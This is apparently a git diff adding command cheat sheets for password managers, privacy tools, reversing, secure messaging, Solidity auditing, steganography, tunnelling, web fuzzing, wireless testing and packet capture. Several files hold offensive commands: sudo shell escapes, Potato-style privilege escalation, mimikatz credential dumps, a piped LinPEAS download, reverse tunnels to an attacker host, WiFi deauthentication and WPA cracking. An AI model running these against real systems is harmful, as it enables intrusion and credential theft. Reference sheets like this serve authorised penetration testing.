+# Git pull changes
+pass git pull
+
+# Git status
+pass git status
+
+# Import from KeePass
+pass import keepass <kdbx_file>
+
+# Export to KeePass (manual or script)
+# pass show <entry> and import to KeePass
+
+# KeePassXC CLI - open database
+keepassxc-cli open <database>
+
+# KeePassXC CLI - list entries
+keepassxc-cli ls <database>
+
+# KeePassXC CLI - show entry
+keepassxc-cli show <database> <entry>
+
+# KeePassXC CLI - show password only
+keepassxc-cli show -s <database> <entry>
+
+# KeePassXC CLI - add entry
+keepassxc-cli add <database> <entry>
+
+# KeePassXC CLI - generate password
+keepassxc-cli generate -L <length>
+
+# KeePassXC CLI - clip password
+keepassxc-cli clip <database> <entry>
+
+# Bitwarden CLI - login
+bw login
+
+# Bitwarden CLI - unlock
+bw unlock
+
+# Bitwarden CLI - list items
+bw list items
+
+# Bitwarden CLI - get password
+bw get password <item_id>
+
+# Bitwarden CLI - create item
+bw create item <json_data>
+
+# Bitwarden CLI - sync
+bw sync
+
+# gopass (pass compatible with teams)
+gopass
+
+# gopass - init with multiple keys
+gopass init <key1> <key2>
+
+# gopass - recipient add
+gopass recipients add <gpg_key_id>
+
+# Rofi integration (pass menu)
+rofi-pass
+
+# Dmenu integration
+passmenu
+
+# Browser integration
+# browserpass extension + browserpass-native
+
+$ gpg_key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
+$ entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
+$ folder: pass 2>/dev/null | grep -v "Password Store" | grep "/" | head -5 | sed 's/[├│└──]//g' | tr -d ' '
+$ length: echo "20\n32\n64"
+$ old_entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
+$ new_entry: echo ""
+$ search_term: echo ""
+$ kdbx_file: find ~ -name "*.kdbx" 2>/dev/null | head -5
+$ database: find ~ -name "*.kdbx" 2>/dev/null | head -5
diff --git a/privacy.cheat b/privacy.cheat
new file mode 100644
index 0000000..bffbc26
--- /dev/null
+++ b/privacy.cheat
@@ -0,0 +1,128 @@
+% privacy, encryption, tor, gpg, pets
+
+# Generate GPG key pair
+gpg --full-generate-key
+
+# List GPG keys
+gpg --list-keys
+
+# List secret keys
+gpg --list-secret-keys
+
+# Export public key
+gpg --armor --export <key_id> > public.asc
+
+# Export private key (backup)
+gpg --armor --export-secret-keys <key_id> > private.asc
+
+# Import a key
+gpg --import <keyfile>
+
+# Encrypt file with GPG (symmetric)
+gpg -c <file>
+
+# Encrypt file for recipient
+gpg -e -r <recipient_email> <file>
+
+# Decrypt GPG file
+gpg -d <file.gpg> > <output_file>
+
+# Sign a file
+gpg --sign <file>
+
+# Verify signature
+gpg --verify <file.sig>
+
+# Age encryption - generate key
+age-keygen -o key.txt
+
+# Age encrypt file
+age -r <public_key> -o <file.age> <file>
+
+# Age decrypt file
+age -d -i key.txt -o <output> <file.age>
+
+# Age encrypt with passphrase
+age -p -o <file.age> <file>
+
+# Start Tor service
+sudo systemctl start tor
+
+# Check Tor status
+sudo systemctl status tor
+
+# Torify a command
+torify <command>
+
+# Use torsocks
+torsocks curl https://check.torproject.org
+
+# Get new Tor circuit
+sudo killall -HUP tor
+
+# Check if using Tor
+curl --socks5 localhost:9050 https://check.torproject.org/api/ip
+
+# I2P - start router
+i2prouter start
+
+# I2P - check status
+i2prouter status
+
+# Secure delete file (shred)
+shred -vfz -n 5 <file>
+
+# Secure delete with srm
+srm -vz <file>
+
+# Wipe free space
+sfill -v <mountpoint>
+
+# BleachBit clean
+bleachbit --clean system.cache system.tmp
+
+# Veracrypt create volume
+veracrypt -t -c
+
+# Veracrypt mount volume
+veracrypt <volume_file> <mount_point>
+
+# Veracrypt dismount
+veracrypt -d <mount_point>
+
+# Check for listening services
+ss -tulpn
+
+# Block all incoming (UFW)
+sudo ufw default deny incoming && sudo ufw enable
+
+# MAC address randomization
+sudo macchanger -r <interface>
+
+# Reset MAC to permanent
+sudo macchanger -p <interface>
+
+# DNS over HTTPS test
+curl -H 'accept: application/dns-json' 'https://cloudflare-dns.com/dns-query?name=example.com&type=A'
+
+# Check DNS leaks
+curl https://dnsleaktest.com/
+
+# Metadata removal from image
+exiftool -all= <image>
+
+# Metadata removal from PDF
+exiftool -all:all= <pdf>
+
+# MAT2 metadata removal
+mat2 <file>
+
+# Check what metadata exists
+exiftool <file>
+
+$ key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
+$ recipient_email: echo ""
+$ file: find . -type f -maxdepth 1 2>/dev/null | head -20
+$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
+$ mount_point: echo "/mnt/veracrypt"
+$ public_key: echo "age1..."
diff --git a/privesc-linux.cheat b/privesc-linux.cheat
new file mode 100644
index 0000000..1110df9
--- /dev/null
+++ b/privesc-linux.cheat
@@ -0,0 +1,71 @@
+% privesc, linux, escalation
+
+# Find SUID binaries
+find / -perm -4000 -type f 2>/dev/null
+
+# Find SGID binaries
+find / -perm -2000 -type f 2>/dev/null
+
+# Check sudo permissions
+sudo -l
+
+# Find writable directories
+find / -writable -type d 2>/dev/null
+
+# Find world-writable files
+find / -perm -o+w -type f 2>/dev/null
+
+# Check cron jobs
+cat /etc/crontab
+ls -la /etc/cron*
+crontab -l
+
+# Find capabilities
+getcap -r / 2>/dev/null
+
+# Check for docker group
+id | grep docker
+
+# Check kernel version (for exploits)
+uname -a
+
+# Check OS version
+cat /etc/os-release
+
+# LinPEAS
+curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+
+# LinEnum
+./LinEnum.sh -t
+
+# Check passwd file writable
+ls -la /etc/passwd
+
+# Check shadow file readable
+ls -la /etc/shadow
+
+# Find password files
+find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
+
+# Check NFS exports (no_root_squash)
+cat /etc/exports
+
+# Find SSH keys
+find / -name "id_rsa" 2>/dev/null
+find / -name "authorized_keys" 2>/dev/null
+
+# Check PATH hijacking
+echo $PATH
+ls -la /usr/local/bin
+
+# GTFOBins sudo bypass - vim
+sudo vim -c ':!/bin/sh'
+
+# GTFOBins sudo bypass - find
+sudo find . -exec /bin/sh \; -quit
+
+# GTFOBins sudo bypass - awk
+sudo awk 'BEGIN {system("/bin/sh")}'
+
+# GTFOBins SUID - python
+./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
diff --git a/privesc-windows.cheat b/privesc-windows.cheat
new file mode 100644
index 0000000..80a88bc
--- /dev/null
+++ b/privesc-windows.cheat
@@ -0,0 +1,83 @@
+% privesc, windows, escalation
+
+# System info
+systeminfo
+
+# Current user privileges
+whoami /priv
+
+# Current user groups
+whoami /groups
+
+# All users
+net user
+
+# User details
+net user <username>
+
+# Local groups
+net localgroup
+
+# Administrators group
+net localgroup administrators
+
+# Running services
+wmic service list brief
+
+# Installed patches
+wmic qfe list
+
+# Scheduled tasks
+schtasks /query /fo LIST /v
+
+# Find unquoted service paths
+wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
+
+# Find writable service directories
+icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
+
+# AlwaysInstallElevated check
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+
+# Stored credentials
+cmdkey /list
+
+# SAM and SYSTEM backup
+dir C:\Windows\Repair\SAM
+dir C:\Windows\System32\config\RegBack\SAM
+
+# PowerUp
+Import-Module .\PowerUp.ps1; Invoke-AllChecks
+
+# WinPEAS
+.\winPEASany.exe
+
+# Juicy Potato (SeImpersonate)
+.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *
+
+# PrintSpoofer (SeImpersonate)
+.\PrintSpoofer.exe -i -c cmd
+
+# GodPotato (SeImpersonate)
+.\GodPotato.exe -cmd "cmd /c whoami"
+
+# Search for passwords in files
+findstr /si password *.txt *.ini *.config
+
+# Search registry for passwords
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+
+# Check saved WiFi passwords
+netsh wlan show profiles
+netsh wlan show profile name="<wifi_name>" key=clear
+
+# Dump SAM with mimikatz
+mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
+
+# Dump credentials with mimikatz
+mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
+
+$ username: echo ""
+$ wifi_name: echo ""
diff --git a/reversing.cheat b/reversing.cheat
new file mode 100644
index 0000000..ac2acb0
--- /dev/null
+++ b/reversing.cheat
@@ -0,0 +1,127 @@
+% reversing, reverse-engineering, ghidra, radare2, gdb, binary
+
+# Ghidra - start GUI
+ghidraRun
+
+# Ghidra - analyze headless
+analyzeHeadless <project_dir> <project_name> -import <binary> -postScript <script>
+
+# radare2 - open binary
+r2 <binary>
+
+# radare2 - analyze all
+r2 -A <binary>
+
+# radare2 - analyze and open
+r2 -AA <binary>
+
+# r2 commands (inside r2):
+# aaa     - analyze all
+# afl     - list functions
+# pdf     - print disassembly of function
+# s main  - seek to main
+# VV      - visual graph mode
+# px 100  - print hex
+# iz      - list strings in data section
+# ii      - list imports
+# ie      - list entry points
+
+# radare2 - list functions
+r2 -qc 'aaa; afl' <binary>
+
+# radare2 - list strings
+r2 -qc 'iz' <binary>
+
+# radare2 - disassemble main
+r2 -qc 'aaa; s main; pdf' <binary>
+
+# GDB - start debugging
+gdb <binary>
+
+# GDB - run with args
+gdb --args <binary> <arg1> <arg2>
+
+# GDB commands:
+# r           - run
+# b main      - breakpoint at main
+# b *0x401000 - breakpoint at address
+# c           - continue
+# n           - next (step over)
+# s           - step (step into)
+# p $eax      - print register
+# x/10x $esp  - examine memory
+# info reg    - show registers
+# disas       - disassemble current function
+# bt          - backtrace
+# q           - quit
+
+# GDB with pwndbg/gef (enhanced)
+gdb -q <binary>
+
+# objdump - disassemble
+objdump -d <binary>
+
+# objdump - all headers
+objdump -x <binary>
+
+# objdump - disassemble with source
+objdump -S <binary>
+
+# readelf - file header
+readelf -h <binary>
+
+# readelf - sections
+readelf -S <binary>
+
+# readelf - symbols
+readelf -s <binary>
+
+# readelf - program headers
+readelf -l <binary>
+
+# nm - list symbols
+nm <binary>
+
+# nm - dynamic symbols
+nm -D <binary>
+
+# strings - extract strings
+strings <binary>
+strings -n 10 <binary>
+
+# file - identify binary type
+file <binary>
+
+# ldd - list shared libraries
+ldd <binary>
+
+# strace - trace syscalls
+strace <binary>
+strace -f <binary>
+
+# ltrace - trace library calls
+ltrace <binary>
+
+# Cutter - r2 GUI
+cutter <binary>
+
+# Binary Ninja (commercial)
+binaryninja <binary>
+
+# IDA Free
+ida64 <binary>
+
+# checksec - binary protections
+checksec --file=<binary>
+
+# ROPgadget - find gadgets
+ROPgadget --binary <binary>
+
+# pwntools (Python)
+# from pwn import *
+# elf = ELF('<binary>')
+
+$ binary: find . -type f -executable 2>/dev/null | head -10
+$ project_dir: echo "/tmp/ghidra_projects"
+$ project_name: echo "analysis"
+$ script: echo ""
diff --git a/secure-comms.cheat b/secure-comms.cheat
new file mode 100644
index 0000000..c3c4067
--- /dev/null
+++ b/secure-comms.cheat
@@ -0,0 +1,129 @@
+% comms, signal, matrix, encrypted, messaging
+
+# Signal CLI - register
+signal-cli -u <phone_number> register
+
+# Signal CLI - verify
+signal-cli -u <phone_number> verify <code>
+
+# Signal CLI - send message
+signal-cli -u <phone_number> send -m "<message>" <recipient>
+
+# Signal CLI - send to group
+signal-cli -u <phone_number> send -m "<message>" -g <group_id>
+
+# Signal CLI - receive messages
+signal-cli -u <phone_number> receive
+
+# Signal CLI - list groups
+signal-cli -u <phone_number> listGroups
+
+# Signal CLI - create group
+signal-cli -u <phone_number> createGroup -n "<group_name>" -m <member1> <member2>
+
+# Signal CLI - daemon mode
+signal-cli -u <phone_number> daemon
+
+# Matrix - login with element-cli
+element-cli login <homeserver> <username> <password>
+
+# Matrix - send message (Python SDK)
+# pip install matrix-nio
+# See nio documentation
+
+# Matrix CLI - gomuks (TUI client)
+gomuks
+
+# Matrix CLI - matrixcli
+matrixcli -s <homeserver> -u <username> send <room_id> "<message>"
+
+# SimpleX Chat - start
+simplex-chat
+
+# Briar - desktop
+briar-desktop
+
+# Session messenger
+session-desktop
+
+# Keybase - login
+keybase login
+
+# Keybase - send message
+keybase chat send <username> "<message>"
+
+# Keybase - encrypt file
+keybase encrypt <username> -i <input_file> -o <output_file>
+
+# Keybase - decrypt file
+keybase decrypt -i <input_file> -o <output_file>
+
+# Keybase - sign file
+keybase sign -i <input_file> -o <output_file.sig>
+
+# Keybase - verify signature
+keybase verify -i <file.sig>
+
+# GPG - encrypt for recipient
+gpg -e -r <recipient> <file>
+
+# GPG - sign and encrypt
+gpg -se -r <recipient> <file>
+
+# GPG - decrypt
+gpg -d <file.gpg>
+
+# age - encrypt for recipient
+age -r <public_key> -o <output.age> <input_file>
+
+# age - encrypt with passphrase
+age -p -o <output.age> <input_file>
+
+# age - decrypt
+age -d -i <key_file> -o <output> <input.age>
+
+# OnionShare - share files over Tor
+onionshare-cli <file>
+
+# OnionShare - receive files
+onionshare-cli --receive
+
+# OnionShare - chat
+onionshare-cli --chat
+
+# Magic Wormhole - send file
+wormhole send <file>
+
+# Magic Wormhole - receive
+wormhole receive <code>
+
+# Croc - send file
+croc send <file>
+
+# Croc - receive
+croc <code>
+
+# XMPP with profanity
+profanity
+
+# IRC with weechat (+ OTR)
+weechat
+
+# Ricochet Refresh (Tor messenger)
+ricochet-refresh
+
+$ phone_number: echo "+1234567890"
+$ recipient: echo "+1234567890"
+$ code: echo ""
+$ message: echo ""
+$ group_id: echo ""
+$ group_name: echo ""
+$ homeserver: echo "https://matrix.org"
+$ username: echo ""
+$ password: echo ""
+$ room_id: echo ""
+$ public_key: echo "age1..."
+$ key_file: echo "key.txt"
+$ input_file: find . -type f 2>/dev/null | head -10
+$ output_file: echo "encrypted"
+$ file: find . -type f 2>/dev/null | head -10
diff --git a/solidity.cheat b/solidity.cheat
new file mode 100644
index 0000000..a090da5
--- /dev/null
+++ b/solidity.cheat
@@ -0,0 +1,129 @@
+% solidity, audit, smartcontract, ethereum, foundry
+
+# Foundry - create new project
+forge init <project_name>
+
+# Foundry - build/compile
+forge build
+
+# Foundry - run tests
+forge test
+
+# Foundry - run tests verbose
+forge test -vvvv
+
+# Foundry - run specific test
+forge test --match-test <test_name>
+
+# Foundry - gas report
+forge test --gas-report
+
+# Foundry - coverage
+forge coverage
+
+# Foundry - deploy contract
+forge create <contract> --rpc-url <rpc_url> --private-key <private_key>
+
+# Foundry - verify contract
+forge verify-contract <address> <contract> --chain <chain_id>
+
+# Cast - call read function
+cast call <contract_address> "<function_sig>" --rpc-url <rpc_url>
+
+# Cast - send transaction
+cast send <contract_address> "<function_sig>" --rpc-url <rpc_url> --private-key <private_key>
+
+# Cast - decode calldata
+cast calldata-decode "<function_sig>" <calldata>
+
+# Cast - get storage slot
+cast storage <contract_address> <slot> --rpc-url <rpc_url>
+
+# Cast - keccak256 hash
+cast keccak "<text>"
+
+# Cast - convert to wei
+cast to-wei <amount> ether
+
+# Cast - convert from wei
+cast from-wei <amount>
+
+# Slither - full analysis
+slither <contract_or_dir>
+
+# Slither - specific detectors
+slither <contract> --detect <detector>
+
+# Slither - print contract summary
+slither <contract> --print contract-summary
+
+# Slither - print function summary
+slither <contract> --print function-summary
+
+# Slither - print inheritance
+slither <contract> --print inheritance-graph
+
+# Slither - human summary
+slither <contract> --print human-summary
+
+# Slither - list detectors
+slither --list-detectors
+
+# Mythril - analyze contract
+myth analyze <contract.sol>
+
+# Mythril - analyze deployed contract
+myth analyze --address <contract_address> --rpc <rpc_url>
+
+# Mythril - execution timeout
+myth analyze <contract.sol> --execution-timeout 300
+
+# Echidna - fuzz testing
+echidna <contract.sol> --contract <contract_name>
+
+# Echidna - with config
+echidna <contract.sol> --contract <contract_name> --config echidna.yaml
+
+# Aderyn - static analysis (Rust-based, fast)
+aderyn <contract_or_dir>
+
+# Solhint - linter
+solhint <contract.sol>
+
+# Solhint - init config
+solhint --init
+
+# Common vulnerability patterns to check:
+# - Reentrancy (external calls before state changes)
+# - Integer overflow/underflow (pre-0.8.0)
+# - Unchecked return values
+# - Access control issues
+# - Front-running susceptibility
+# - Oracle manipulation
+# - Flash loan attacks
+# - Delegate call to untrusted contract
+
+# Check for selfdestruct
+grep -rn "selfdestruct\|suicide" <dir>
+
+# Check for delegatecall
+grep -rn "delegatecall" <dir>
+
+# Check for tx.origin
+grep -rn "tx.origin" <dir>
+
+# Check for inline assembly
+grep -rn "assembly" <dir>
+
+$ project_name: echo "my_project"
+$ contract: find . -name "*.sol" 2>/dev/null | head -10
+$ contract_or_dir: echo "."
+$ contract_address: echo "0x..."
+$ rpc_url: echo "https://eth-mainnet.g.alchemy.com/v2/YOUR_KEY"
+$ private_key: echo ""
+$ function_sig: echo "balanceOf(address)"
+$ test_name: echo "test"
+$ detector: echo "reentrancy-eth\nreentrancy-no-eth\narbitrary-send\nsuicide\nuninitialized-storage"
+$ chain_id: echo "1\n5\n137\n42161" --- --header "1=mainnet, 5=goerli, 137=polygon, 42161=arbitrum"
+$ slot: echo "0"
+$ dir: echo "src/"
diff --git a/steganography.cheat b/steganography.cheat
new file mode 100644
index 0000000..6b7d7ce
--- /dev/null
+++ b/steganography.cheat
@@ -0,0 +1,117 @@
+% steganography, stego, hidden, ctf
+
+# steghide - extract hidden data
+steghide extract -sf <image>
+
+# steghide - extract with password
+steghide extract -sf <image> -p <password>
+
+# steghide - embed data
+steghide embed -cf <cover_image> -ef <secret_file>
+
+# steghide - info about file
+steghide info <image>
+
+# stegseek - crack steghide password
+stegseek <image> <wordlist>
+
+# stegseek - without wordlist (rockyou default)
+stegseek <image>
+
+# zsteg - PNG/BMP analysis
+zsteg <image>
+
+# zsteg - all checks
+zsteg -a <image>
+
+# binwalk - scan for embedded files
+binwalk <file>
+
+# binwalk - extract embedded files
+binwalk -e <file>
+
+# binwalk - extract with matryoshka
+binwalk -eM <file>
+
+# foremost - file carving
+foremost -i <file> -o <output_dir>
+
+# exiftool - view all metadata
+exiftool <file>
+
+# exiftool - view specific tag
+exiftool -Comment <file>
+
+# strings - find hidden text
+strings <file>
+strings -n 10 <file>
+
+# xxd - hex dump
+xxd <file> | head -50
+
+# Check file magic bytes
+xxd -l 16 <file>
+file <file>
+
+# pngcheck - PNG structure
+pngcheck -v <image>
+
+# stegoveritas - multiple stego checks
+stegoveritas <image>
+
+# openstego - extract (GUI tool)
+openstego extract -sf <image> -xd <output_dir>
+
+# outguess - extract
+outguess -r <image> <output_file>
+
+# jsteg - JPEG steganography
+jsteg reveal <image>
+
+# Audio steganography - Audacity
+# Open in Audacity, check spectrogram view
+
+# Audio steganography - sonic-visualiser
+sonic-visualiser <audio_file>
+
+# LSB extraction with Python
+# from PIL import Image
+# img = Image.open('image.png')
+# Extract least significant bits
+
+# Check for appended data
+# Compare file size to expected size
+# Look for data after EOF marker
+
+# SNOW - whitespace steganography
+snow -C <text_file>
+
+# stegsnow - extract from whitespace
+stegsnow -C <text_file>
+
+# PDF steganography - check streams
+pdf-parser <pdf_file>
+pdftotext <pdf_file>
+
+# QR code extraction
+zbarimg <image>
+
+# Common CTF stego workflow:
+# 1. file / xxd - identify type
+# 2. exiftool - check metadata
+# 3. strings - hidden text
+# 4. binwalk - embedded files
+# 5. steghide/stegseek - hidden data
+# 6. zsteg - LSB for PNG
+
+$ image: find . -name "*.jpg" -o -name "*.png" -o -name "*.bmp" 2>/dev/null | head -10
+$ file: find . -type f 2>/dev/null | head -10
+$ cover_image: find . -name "*.jpg" 2>/dev/null | head -5
+$ secret_file: echo "secret.txt"
+$ password: echo ""
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ output_dir: echo "extracted"
+$ output_file: echo "output.txt"
+$ text_file: find . -name "*.txt" 2>/dev/null | head -5
+$ audio_file: find . -name "*.wav" -o -name "*.mp3" 2>/dev/null | head -5
+$ pdf_file: find . -name "*.pdf" 2>/dev/null | head -5
diff --git a/tunnels.cheat b/tunnels.cheat
new file mode 100644
index 0000000..d5ca676
--- /dev/null
+++ b/tunnels.cheat
@@ -0,0 +1,114 @@
+% tunnels, ssh, pivoting, portforward, proxy
+
+# SSH local port forward
+ssh -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
+
+# SSH remote port forward
+ssh -R <remote_port>:<local_host>:<local_port> <user>@<remote_host>
+
+# SSH dynamic SOCKS proxy
+ssh -D <socks_port> <user>@<host>
+
+# SSH with ProxyJump (bastion)
+ssh -J <user>@<jump_host> <user>@<target_host>
+
+# SSH tunnel background
+ssh -fN -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
+
+# SSH reverse tunnel (callback)
+ssh -fN -R <remote_port>:localhost:22 <user>@<attacker_host>
+
+# Chisel server (on attacker)
+chisel server -p <port> --reverse
+
+# Chisel client reverse SOCKS
+chisel client <attacker_ip>:<port> R:socks
+
+# Chisel client port forward
+chisel client <attacker_ip>:<port> R:<remote_port>:<target_host>:<target_port>
+
+# Chisel client local forward
+chisel client <server_ip>:<port> <local_port>:<target_host>:<target_port>
+
+# Ligolo-ng proxy (attacker)
+./proxy -selfcert
+
+# Ligolo-ng agent (victim)
+./agent -connect <attacker_ip>:11601 -ignore-cert
+
+# Socat port forward
+socat TCP-LISTEN:<local_port>,fork TCP:<target_host>:<target_port>
+
+# Socat file transfer
+# Receiver:
+socat TCP-LISTEN:<port>,fork file:<output_file>,create
+# Sender:
+socat TCP:<target>:<port> file:<input_file>
+
+# Netcat relay
+nc -lvp <port1> | nc <target> <port2>
+
+# Proxychains with nmap
+proxychains nmap -sT -Pn <target>
+
+# Proxychains any command
+proxychains <command>
+
+# Edit proxychains config
+# /etc/proxychains4.conf
+# socks5 127.0.0.1 1080
+
+# WireGuard - generate keys
+wg genkey | tee privatekey | wg pubkey > publickey
+
+# WireGuard - quick up
+wg-quick up <interface>
+
+# WireGuard - quick down
+wg-quick down <interface>
+
+# WireGuard - show status
+wg show
+
+# sshuttle - VPN over SSH
+sshuttle -r <user>@<host> <network_cidr>
+
+# sshuttle - all traffic
+sshuttle -r <user>@<host> 0/0
+
+# Metasploit portfwd
+# portfwd add -l <local> -p <remote_port> -r <target>
+
+# Meterpreter autoroute
+# run autoroute -s <subnet>
+
+# plink (Windows SSH)
+plink.exe -L <local_port>:<target>:<target_port> <user>@<host>
+
+# netsh port forward (Windows)
+netsh interface portproxy add v4tov4 listenport=<local_port> listenaddress=0.0.0.0 connectport=<target_port> connectaddress=<target_host>
+
+# netsh show forwards
+netsh interface portproxy show all
+
+# netsh delete forward
+netsh interface portproxy delete v4tov4 listenport=<local_port> listenaddress=0.0.0.0
+
+$ local_port: echo "8080"
+$ target_host: echo ""
+$ target_port: echo "80"
+$ user: echo ""
+$ jump_host: echo ""
+$ remote_host: echo ""
+$ remote_port: echo "9999"
+$ local_host: echo "127.0.0.1"
+$ socks_port: echo "1080"
+$ host: echo ""
+$ attacker_ip: echo ""
+$ attacker_host: echo ""
+$ port: echo "8080"
+$ server_ip: echo ""
+$ network_cidr: echo "10.0.0.0/24"
+$ interface: echo "wg0"
+$ output_file: echo "received_file"
+$ input_file: find . -type f 2>/dev/null | head -5
diff --git a/web.cheat b/web.cheat
new file mode 100644
index 0000000..74a892c
--- /dev/null
+++ b/web.cheat
@@ -0,0 +1,59 @@
+% web, webapp, burp, fuzzing
+
+# Directory fuzzing with ffuf
+ffuf -u http://<target>/FUZZ -w <wordlist>
+
+# Directory fuzzing with extensions
+ffuf -u http://<target>/FUZZ -w <wordlist> -e .php,.html,.txt,.bak
+
+# Subdomain fuzzing
+ffuf -u http://FUZZ.<domain> -w <wordlist> -H "Host: FUZZ.<domain>"
+
+# POST parameter fuzzing
+ffuf -u http://<target>/login -X POST -d "username=admin&password=FUZZ" -w <wordlist>
+
+# Filter by status code
+ffuf -u http://<target>/FUZZ -w <wordlist> -fc 404
+
+# Filter by response size
+ffuf -u http://<target>/FUZZ -w <wordlist> -fs 0
+
+# Gobuster directory scan
+gobuster dir -u http://<target> -w <wordlist>
+
+# Gobuster with extensions
+gobuster dir -u http://<target> -w <wordlist> -x php,html,txt
+
+# Nikto scan
+nikto -h http://<target>
+
+# WhatWeb (technology detection)
+whatweb http://<target>
+
+# SQLMap basic
+sqlmap -u "http://<target>/page.php?id=1" --batch
+
+# SQLMap dump database
+sqlmap -u "http://<target>/page.php?id=1" --dbs --batch
+
+# SQLMap dump tables
+sqlmap -u "http://<target>/page.php?id=1" -D <database> --tables --batch
+
+# XSS test payload
+<script>alert('XSS')</script>
+
+# Curl with POST data
+curl -X POST http://<target>/login -d "username=admin&password=test" -v
+
+# Curl with cookies
+curl http://<target> -b "session=<cookie>"
+
+# Curl with headers
+curl http://<target> -H "Authorization: Bearer <token>"
+
+$ target: echo ""
+$ domain: echo ""
+$ wordlist: echo "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
+$ database: echo ""
+$ cookie: echo ""
+$ token: echo ""
diff --git a/wireless.cheat b/wireless.cheat
new file mode 100644
index 0000000..927ede9
--- /dev/null
+++ b/wireless.cheat
@@ -0,0 +1,89 @@
+% wireless, wifi, aircrack, wpa, hacking
+
+# Check wireless interfaces
+iwconfig
+
+# Kill interfering processes
+sudo airmon-ng check kill
+
+# Start monitor mode
+sudo airmon-ng start <interface>
+
+# Stop monitor mode
+sudo airmon-ng stop <monitor_interface>
+
+# Scan for networks
+sudo airodump-ng <monitor_interface>
+
+# Target specific network (capture handshake)
+sudo airodump-ng -c <channel> --bssid <bssid> -w <output_prefix> <monitor_interface>
+
+# Deauth attack (force handshake)
+sudo aireplay-ng -0 <count> -a <bssid> -c <client_mac> <monitor_interface>
+
+# Deauth broadcast (all clients)
+sudo aireplay-ng -0 <count> -a <bssid> <monitor_interface>
+
+# Crack WPA/WPA2 handshake
+aircrack-ng -w <wordlist> -b <bssid> <capture_file>
+
+# Crack with hashcat (faster - convert first)
+cap2hccapx <capture_file> output.hccapx
+hashcat -m 22000 output.hccapx <wordlist>
+
+# PMKID attack (no handshake needed)
+sudo hcxdumptool -i <monitor_interface> -o pmkid.pcapng --enable_status=1
+
+# Convert PMKID for hashcat
+hcxpcapngtool -o hash.22000 pmkid.pcapng
+hashcat -m 22000 hash.22000 <wordlist>
+
+# Fake AP with hostapd-wpe
+sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
+
+# WPS attack with reaver
+sudo reaver -i <monitor_interface> -b <bssid> -vv
+
+# WPS attack with bully
+sudo bully -b <bssid> -c <channel> <monitor_interface>
+
+# Pixie dust attack (WPS)
+sudo reaver -i <monitor_interface> -b <bssid> -vv -K 1
+
+# Wifite - automated attacks
+sudo wifite
+
+# Wifite - WPA only
+sudo wifite --wpa
+
+# Check if handshake captured
+aircrack-ng <capture_file>
+
+# Create wordlist from AP info
+crunch 8 8 -t <ssid>%%%% -o custom_wordlist.txt
+
+# Wash - find WPS enabled APs
+sudo wash -i <monitor_interface>
+
+# Fern WiFi Cracker (GUI)
+sudo fern-wifi-cracker
+
+# Kismet - wireless detection
+kismet
+
+# Show saved WiFi passwords (Linux)
+sudo cat /etc/NetworkManager/system-connections/* | grep psk=
+
+# Show saved WiFi passwords (Windows)
+netsh wlan show profile name="<ssid>" key=clear
+
+$ interface: iw dev | grep Interface | awk '{print $2}'
+$ monitor_interface: iw dev | grep Interface | awk '{print $2}' | head -1
+$ channel: echo "1\n6\n11"
+$ bssid: echo ""
+$ client_mac: echo ""
+$ output_prefix: echo "capture"
+$ capture_file: find . -name "*.cap" -o -name "*.pcap" 2>/dev/null
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ count: echo "5\n10\n0" --- --header "0=continuous"
+$ ssid: echo ""
diff --git a/wireshark.cheat b/wireshark.cheat
new file mode 100644
index 0000000..4818a7a
--- /dev/null
+++ b/wireshark.cheat
@@ -0,0 +1,94 @@
+% wireshark, tshark, tcpdump, packets, network-analysis
+
+# Wireshark - open GUI
+wireshark
+
+# Wireshark - open specific file
+wireshark <pcap_file>
+
+# tshark - capture on interface
+sudo tshark -i <interface>
+
+# tshark - capture to file
+sudo tshark -i <interface> -w <output_pcap>
+
+# tshark - read pcap file
+tshark -r <pcap_file>
+
+# tshark - filter by IP
+tshark -r <pcap_file> -Y "ip.addr == <ip>"
+
+# tshark - filter by port
+tshark -r <pcap_file> -Y "tcp.port == <port>"
+
+# tshark - HTTP traffic only
+tshark -r <pcap_file> -Y "http"
+
+# tshark - DNS traffic only
+tshark -r <pcap_file> -Y "dns"
+
+# tshark - follow TCP stream
+tshark -r <pcap_file> -z follow,tcp,ascii,<stream_number>
+
+# tshark - extract HTTP objects
+tshark -r <pcap_file> --export-objects http,<output_dir>
+
+# tshark - show conversations
+tshark -r <pcap_file> -z conv,tcp
+
+# tshark - protocol hierarchy
+tshark -r <pcap_file> -z io,phs
+
+# tshark - credentials (basic)
+tshark -r <pcap_file> -Y "http.authorization or ftp.request.command == USER or ftp.request.command == PASS"
+
+# tcpdump - capture on interface
+sudo tcpdump -i <interface>
+
+# tcpdump - capture to file
+sudo tcpdump -i <interface> -w <output_pcap>
+
+# tcpdump - read pcap
+tcpdump -r <pcap_file>
+
+# tcpdump - filter by host
+sudo tcpdump -i <interface> host <ip>
+
+# tcpdump - filter by port
+sudo tcpdump -i <interface> port <port>
+
+# tcpdump - filter by network
